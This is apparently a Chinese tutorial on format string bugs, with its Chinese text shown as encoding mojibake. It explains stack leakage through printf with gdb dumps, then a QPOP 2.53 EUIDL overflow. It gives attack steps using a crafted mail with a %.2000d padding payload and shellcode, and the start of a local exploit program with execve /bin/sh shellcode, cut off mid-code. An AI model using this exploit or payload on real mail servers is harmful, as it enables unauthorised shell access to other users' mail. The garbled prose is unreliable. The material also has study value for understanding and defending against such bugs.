int main(void)
{
聽(tīng)聽(tīng)聽(tīng)char string[]="Hello World!";
聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)printf("String: %s聽(tīng)聽(tīng), arg2: %#p , arg3: %#p\n", string);
聽(tīng)聽(tīng)聽(tīng)return 0;
}

<- end ->聽(tīng)聽(tīng)

涓婇潰鐨勪緥瀛愪腑鎴戜滑鍏跺疄鍙彁渚涗簡(jiǎn)涓涓暟鎹弬鏁?string",浣嗗湪鏍煎紡涓蹭腑鏈変笁涓墦鍗版牸寮忥紝
鎴戜滑鐪嬩竴涓嬭繍琛岀殑緇撴灉錛?br />
[warning3@redhat-6 format]$ gcc -o fmt_test fmt_test.c
[warning3@redhat-6 format]$ ./fmt_test
String: Hello World!聽(tīng)聽(tīng), arg2: 0x6c6c6548 , arg3: 0x6f57206f

鎴戜滑鏉ョ湅涓涓媋rg2,arg3鏄劇ず鐨勬槸鍝噷鐨勫唴瀹癸細(xì)
[warning3@redhat-6 format]$ gdb ./fmt_test
<...>
(gdb) b printf
Breakpoint 1 at 0x8048308
(gdb) r
Starting program: /home/warning3/format/./fmt_test
Breakpoint 1 at 0x40064f5c: file printf.c, line 30.

Breakpoint 1, printf (
聽(tīng)聽(tīng)聽(tīng)聽(tīng)format=0x80484c0 "String: %s聽(tīng)聽(tīng), arg2: %#p , arg3: %#p\n") at printf.c:30
30聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf.c: No such file or directory.
(gdb) x/10x $ebp
0xbffffc88:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0xbffffca8聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x08048403聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x080484c0聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0xbffffc98
0xbffffc98:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x6c6c6548聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x6f57206f聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x21646c72聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x08049500
0xbffffca8:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0xbffffcc8聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x400301eb

鎴戜滑鐪嬪埌printf()鐨勭涓涓弬鏁板湴鍧鏄?ebp+8,閲岄潰鐨勫唴瀹規(guī)槸0x080484c0,
(gdb) x/s 0x080484c0
0x80484c0 <_IO_stdin_used+60>:聽(tīng)聽(tīng)聽(tīng)"String: %s聽(tīng)聽(tīng), arg2: %#p , arg3: %#p\n"
榪欐槸鎴戜滑鐨勬牸寮忓寲涓茬殑鍦板潃

鍐嶆潵鐪嬫垜浠鏍煎紡鍖栬緭鍑虹殑鏁版嵁($ebp+12):
(gdb) x/s 0xbffffc98
0xbffffc98:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)"Hello World!"

鎴戜滑鐪嬪埌錛岀揣鎺ョ潃涓嬫潵鐨勪袱涓瓧鐨勫唴瀹瑰氨鏄垰鎵嶇殑紼嬪簭涓樉紺虹殑緇撴灉錛?br />$ebp+16: 0x6c6c6548聽(tīng)聽(tīng)"Hell"
$ebp+20: 0x6f57206f聽(tīng)聽(tīng)"o Wo"

浠庝笅闈㈢殑紺烘剰鍥句笂鍙互鐪嬪緱鏇存竻妤氫竴浜涳細(xì)

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鏍堥《
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)|聽(tīng)聽(tīng)聽(tīng)......聽(tīng)聽(tīng)聽(tīng)|聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
0xbffffc88| 0xbffffca8 | --------> 淇濆瓨鐨凟BP聽(tīng)聽(tīng)-- printf()
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)| 0x08048403 | --------> 淇濆瓨鐨凟IP聽(tīng)聽(tīng)-- printf()
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+聽(tīng)聽(tīng)format
format->聽(tīng)聽(tīng)| 0x080484c0 | --------> "String: %s聽(tīng)聽(tīng), arg2: %#p , arg3: %#p\n"鐨勫湴鍧
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+聽(tīng)聽(tīng)arg1
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)| 0xbffffc98 | --------> "Hello World!"鐨勫湴鍧聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)| 0x6c6c6548 | --------> string[] = "Hell聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)| 0x6f57206f | -------->聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)o Wo
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)| 0x21646c72 | -------->聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)rld!"
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)| 0x08049500 | -------->聽(tīng)聽(tīng)聽(tīng)'\0'xxx
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
0xbffffca8| 0xbffffcc8 | --------> 淇濆瓨鐨凟BP聽(tīng)聽(tīng)-- main()
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)| 0x400301eb | --------> 淇濆瓨鐨凟IP聽(tīng)聽(tīng)-- main()
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)|聽(tīng)聽(tīng)聽(tīng)......聽(tīng)聽(tīng)聽(tīng)|聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+------------+
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鏍堝簳

鎴戜滑鍙互鐪嬪埌錛宎rg2,arg3鎵鏄劇ず鐨勫叾瀹炴槸main()涓暟緇剆trings涓墠涓や釜瀛楃殑鍐呭銆?br />浠庝笂闈㈣繖涓畝鍗曠殑渚嬪瓙鎴戜滑鍙互鐪嬪埌, *printf()鍙牴鎹甪ormat涓墦鍗版牸寮?%)鐨勬暟鐩潵渚濇
鏄劇ず鍫嗘爤涓璮ormat鍙傛暟鍚庨潰鍦板潃鐨勫唴瀹?姣忔縐誨姩涓涓瓧(4涓瓧鑺?.
鐢變簬鎴戜滑涓婇潰鐨勪緥瀛愪腑鍑虹幇浜?jiǎn)涓変?%)鍙鳳紝鎵浠ュ畠浼?xì)渚潒啤鎵撳嶎C笁涓湴鍧鐨勫唴瀹?
format+4, format + 8, format + 12.

(娉ㄦ剰錛氬茍涓嶆槸鎵鏈夌殑%鏍煎紡閮芥槸縐誨姩4涓瓧鑺傦紝渚嬪%f灝辨瘡嬈$Щ鍔?涓瓧鑺傘傚鏋滆瑕嗙洊鐨勫湴鍧
璺濈姣旇緝榪?姣斿2048瀛楄妭)錛岃?鐨勪釜鏁板張鏈夋墍闄愬埗鐨勮瘽錛屼嬌鐢?f鍙互杈冨揩鐨勫埌杈?鐩殑鍦?錛?br />鍙渶瑕?56涓?f灝卞彲浠ヤ簡(jiǎn),%E涔熸槸濡傛)

姝e父鎯呭喌涓嬶紝鐢變簬format涓查氬父鏄▼搴忓憳鑷繁鏉ュ畾鍒訛紝寰堝皯鍑虹幇涓婇潰閭g鎯呭喌錛岃屼笖鍗充嬌
鍑虹幇浜?jiǎn)锛屼篃迤堜笉浼?xì)鏈変粈涔堝ぇ鐨勫畨鍏ㄩ棶棰樸傜劧鑰岋紝濡傛灉format涓叉槸鐢辯敤鎴鋒彁渚涚殑璇濓紝閭d箞灝?br />闈炲父鍗遍櫓浜?jiǎn)锛仒q欑鎯呭喌寰寰鏄敱浜庣▼搴忓憳鐨勭枏蹇藉鑷寸殑銆傛渶甯歌鐨勬儏鍐墊槸褰撻渶瑕佸埄鐢?br />vsprintf()絳夋潵鏋勯犺嚜宸辯殑綾籶rintf()鍑芥暟鏃訛紝渚嬪

mylog(LEVEL, "username = %s", username);

濡傛灉寮曠敤mylog鏃墮敊璇殑浣跨敤浜?jiǎn)mylog(LEVEL,user_buf),鑰寀ser_buf鐨勫唴瀹瑰張鏄敤鎴峰彲浠ユ帶
鍒剁殑璇濓紝閭d箞鐪熸鐨勫嵄闄╁氨鏉ヤ簡(jiǎn)銆?br />

1. 闂?shù)竴錛氭牸寮忓寲涓插鑷寸殑浼犵粺緙撳啿鍖烘孩鍑?/h4>==========================================
鎴戜滑浠ヤ笉涔呭墠鍙戠幇鐨凲POP 2.53鐨勪緥瀛愭潵鍋氫竴涓嬭緇嗙殑璇存槑銆?br />

QPOP 2.53涓璸op_uidl.c涓湁涓嚱鏁皃op_euidl (p)錛岀敤鏉ュ畬鎴怑UIDL鍛戒護(hù)鐨勫姛鑳斤紝瀹冮敊璇殑
浣跨敤浜?jiǎn)pop_msg()鍑芥暟錛?br />
.......
pop_euidl (p)
POP聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*聽(tīng)聽(tīng)聽(tīng)p;
{
聽(tīng)聽(tīng)聽(tīng)聽(tīng)char聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)buffer[MAXLINELEN];聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/*聽(tīng)聽(tīng)Read buffer */
聽(tīng)聽(tīng)聽(tīng)聽(tīng)char聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*nl, *bp;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)MsgInfoList聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*聽(tīng)聽(tīng)聽(tīng)mp;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/*聽(tīng)聽(tīng)Pointer to message info list */
......
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)if (mp->del_flag) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/* 娉ㄦ剰錛?榪欓噷浣跨敤pop_msg()鐨勫仛娉曟槸姝g‘鐨勶紒 娉ㄦ剰鍜屼笅闈㈤偅涓猵op_msg()鐨勭敤娉?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鍋氫竴涓嬫瘮杈冦?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)return (pop_msg (p,POP_FAILURE,
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)"Message %d has been marked for deletion.",msg_id));
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)} else {

聽(tīng)聽(tīng)聽(tīng)聽(tīng)sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)if (nl = index(buffer, NEWLINE)) *nl = 0;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/* 涓嬮潰榪欎釜sprintf()灝嗙敤鎴瘋緭鍏ョ殑鏁版嵁鎷瘋礉鍒癰uffer涓紝鐢變簬闄愬埗浜?s鐨勫搴︼紝
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鍥犳涓嶄細(xì)鍙戠敓緙撳啿鍖烘孩鍑?*/聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)/* 娉ㄦ剰錛氳繖閲岀洿鎺ュ皢buffer浣滀負(fù)絎笁涓弬鏁頒紶閫掔粰pop_msg(),榪欐槸閿欒鐨勶紒 */
聽(tīng)聽(tīng)聽(tīng)聽(tīng)return (pop_msg (p,POP_SUCCESS, buffer));
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)}

鎴戜滑鍐嶆潵鐪嬬湅pop_msg()鍑芥暟錛屽畠鍦╬op_msg.c涓畾涔夛細(xì)

......
#define BUFSIZE 2048
......
#ifdef __STDC__
/* 鎴戜滑鐪嬪埌錛宲op_msg()鐨勭涓変釜鍙傛暟鏄痜ormat涓?/
pop_msg(POP *p, int stat, const char *format,...)
#else
pop_msg(va_alist)
va_dcl
#endif
{
#ifndef __STDC__
聽(tīng)聽(tīng)聽(tīng)聽(tīng)POP聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*聽(tīng)聽(tīng)聽(tīng)p;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)int聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)stat;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/*聽(tīng)聽(tīng)POP status indicator */
聽(tīng)聽(tīng)聽(tīng)聽(tīng)char聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*聽(tīng)聽(tīng)聽(tīng)format;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/*聽(tīng)聽(tīng)Format string for the message */
#endif
聽(tīng)聽(tīng)聽(tīng)聽(tīng)va_list聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)ap;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)register char聽(tīng)聽(tīng)聽(tīng)*聽(tīng)聽(tīng)聽(tīng)mp;
#ifdef PYRAMID
聽(tīng)聽(tīng)聽(tīng)聽(tīng)char聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*聽(tīng)聽(tīng)聽(tīng)arg1, *arg2, *arg3, *arg4, *arg5, *arg6;
#endif
聽(tīng)聽(tīng)聽(tīng)聽(tīng)char聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)message[BUFSIZE]; /* 瀹氫箟浜?jiǎn)涓涓狟UFSIZE=2048澶у皬鐨勭紦鍐插尯 */

#ifdef __STDC__
聽(tīng)聽(tīng)聽(tīng)聽(tīng)va_start(ap,format);
.......

聽(tīng)聽(tīng)聽(tīng)聽(tīng)/*聽(tīng)聽(tīng)Point to the message buffer */
聽(tīng)聽(tīng)聽(tīng)聽(tīng)mp = message;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/* mp鎸囧悜message[]璧峰鍦板潃 */
......
聽(tīng)聽(tīng)聽(tīng)聽(tīng)/*聽(tīng)聽(tīng)Append the message (formatted, if necessary) */
聽(tīng)聽(tīng)聽(tīng)聽(tīng)if (format) {
#ifdef HAVE_VPRINTF
/* 榪欓噷灝嗗彉鍙俛p鎸夌収format鐨勬牸寮忚緭鍑哄埌mp鎵鎸囧悜鐨刴essage[]涓?
聽(tīng)聽(tīng)聽(tīng)娉ㄦ剰錛岃繖閲屾病鏈夋鏌ユ嫹璐濇暟鎹殑澶у皬錛?br />*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)vsprintf(mp,format,ap);

.....

鎴戜滑鐪嬪埌pop_euidl()涓殑buffer,鏈潵搴旇鍑虹幇鍦╬op_msg()鐨勭鍥涗釜鍙傛暟浣嶇疆涓婏紝涔熷氨鏄?br />pop_msg()鐨刟p鎵鎸囧悜鐨勫唴瀹癸紝姝g‘鐨勬牸寮忓簲璇ヨ薄涓嬮潰榪欐牱錛?br />pop_msg (p,POP_SUCCESS, "%s", buffer);
榪欐牱鐢變簬buffer鐨勯暱搴︽槸鏈夐檺鍒剁殑錛宲op_msg()涓殑vsprintf()灝變笉浼?xì)漶旂敓婧㈠嚭銆?br />浣嗙敱浜庣▼搴忓憳鐨勭枏蹇斤紝閿欒鐨勫皢buffer鏀懼湪浜?jiǎn)绗笁涓弬鏁扮殑浣嵕|笂錛屽叾瀹炲氨鏄痯op_msg()涓?br />format鎵鎸囧悜鐨勫唴瀹廣傝宐uffer涓殑閮ㄥ垎鍐呭鏄敱鐢ㄦ埛鎻愪緵鐨勶紝鍥犳濡傛灉鐢ㄦ埛杈撳叆鐨勬暟
鎹腑鍖呭惈鏌愪簺鐗瑰埆鐨勬墦鍗版牸寮忥紝灝卞彲鑳藉埄鐢╲sprintf()璋冪敤婧㈠嚭message緙撳啿鍖恒?br />
閭d箞鍏蜂綋濡備綍鏉ュ仛鍛紵鎴戜滑鐭ラ亾鎵撳嵃鏍煎紡涓湁涓噸瑕佺殑閮ㄥ垎鏄墦鍗板搴︼紝渚嬪錛?.20d,%20d
%20s,%.20s絳夌瓑銆備互printf("%.20d",num)涓轟緥錛屽鏋滄暣鏁皀um鐨勯暱搴﹀皬浜?0,printf()浼?xì)鍦?br />瀹冨墠闈㈣ˉ闆舵潵浣挎墦鍗板嚭鏉ョ殑闀垮害涓?0,渚嬪錛?br />printf("%.20d\n",12345);
鎵撳嵃緇撴灉濡備笅錛?br />00000000000000012345

榪欒鎴戜滑鎯沖埌錛屾槸鍚﹀彲浠ラ氳繃瀹氫箟鎵撳嵃瀹藉害鏉ュ~鍏卪essage緙撳啿鍖哄憿錛?br />濡傛灉鎴戜滑鏋勯燽uffer鐨勫唴瀹硅瀹冭薄榪欎釜鏍峰瓙錛?br />
xxx%.2000d<RET><RET>...<RET>

閭d箞vsprintf(mp,"xxx%.2000d<RET><RET>...<RET>",ap);
灝卞彲鑳戒嬌<RET>瑕嗙洊pop_msg()鍑芥暟鐨勮繑鍥炲湴鍧,濡傛灉鎴戜滑鍙互鍦?lt;RET>榪欎釜鍦板潃涓斁鍏hellcode
,灝卞彲鑳借幏寰椾竴涓繙紼媠hell浜?jiǎn)銆傜敱浜庨氬父Qpoper娌℃湁涓㈠純mail緇勬潈闄愶紝鍥犳鎴戜滑鍙互鑾峰緱涓涓?br />gid=mail鐨剆hell,鍙互鏌ョ湅鍏朵粬鏅氱敤鎴風(fēng)殑閭歡....

涓轟簡(jiǎn)杈懼埌鎴戜滑鐨勭洰鏍囷紝鎴戜滑闇瑕佸仛鐨勪簨鏄細(xì)

<1> 鍙戜竴灝侀偖浠剁粰瑕佹敾鍑葷殑鐢ㄦ埛錛屽湪X-UIDL:鍩熶腑鏀懼叆鎴戜滑鐨剆hellcode,
聽(tīng)聽(tīng)聽(tīng)聽(tīng)鍦‵rom:鍩熶腑鏀懼叆%.2000d<RET><RET>...<RET>
聽(tīng)聽(tīng)聽(tīng)聽(tīng)娉ㄦ剰榪欎釜<RET>鐨勫湴鍧闇瑕侀氳繃璋冭瘯鎵嶈兘紜畾錛屽畠搴旇鎸囧悜鎴戜滑鐨剆hellcode鎵鍦ㄥ湴鍧銆?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)
<2> 浠ヨ鐢ㄦ埛韜喚鐧婚檰QPOP server,鎵цEUIDL num鍛戒護(hù)錛岃繖閲岀殑num搴旇鏄垜浠垰鎵嶅彂閫?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)鐨勯偅灝佺壒孌婇偖浠剁殑搴忓彿銆?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)濡傛灉涓鍒囬『鍒╃殑璇濓紝浣犲氨鍙互寰楀埌涓涓猤id mail鐨剆hell浜?jiǎn)銆?br />
涓嬮潰鎴戜滑鎻愪緵涓涓畝鍗曠殑嫻嬭瘯紼嬪簭錛屽畠浼?xì)缁欎綘涓涓湰鍦扮殑gid mail shell:
(浣犲彲鑳介渶瑕佽嚜宸辮皟鏁磖etloc浠ュ強(qiáng)POP *p鐨勫湴鍧鎵嶈兘鎴愬姛)

<- begin ->聽(tīng)聽(tīng)qpop2.53_local.c

/*聽(tīng)聽(tīng)QPOP 2.53 local exploit .
*聽(tīng)聽(tīng)code based on the sample exploit by Prizm/b0f.
*聽(tīng)聽(tīng)usages:
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)[test@redhat-6 /tmp]$ ./qp 0xbfffcba4 0xbfffdbf8 >/var/spool/mail/test
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)[test@redhat-6 /tmp]$ nc localhost 110
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+OK QPOP (version 2.53) at localhost.localdomain starting.聽(tīng)聽(tīng)
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)user test
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+OK Password required for test.
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)pass 123456
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)+OK test has 1 message (307 octets).
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)euidl 1
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)<...snip...>
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)id
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)uid=514(test) gid=12(mail) groups=12(mail)聽(tīng)聽(tīng)
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)warning3@isbase.com
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)y2k/5/28
*/

錛僫 nclude <stdio.h>
錛僫 nclude <string.h>

char shellcode[]=
聽(tīng)聽(tīng)聽(tīng)"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
聽(tīng)聽(tīng)聽(tīng)"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
聽(tīng)聽(tīng)聽(tīng)"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
聽(tīng)聽(tīng)聽(tīng)"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
聽(tīng)聽(tīng)聽(tīng)"\xff\xff/bin/sh....";

int main(int argc, char *argv[])
{
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)int i;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)unsigned long ra=0;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)unsigned long p= 0xbffffdf8;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)if(argc<2) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)fprintf(stderr,"Usage: %s return_addr POP(*)_addr\n", argv[0]);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)exit(0);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)}
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)sscanf(argv[1], "%x", &ra);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/* 鐢變簬pop_msg()鍙戠敓婧㈠嚭鍚庤繕闇瑕佷竴涓湁鏁堢殑POP *p鎸囬拡鎵嶈兘姝g‘緇撴潫錛屾墍浠?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)* 鎴戜滑蹇呴』瑕佹彁渚涗竴涓湁鏁堢殑鍦板潃
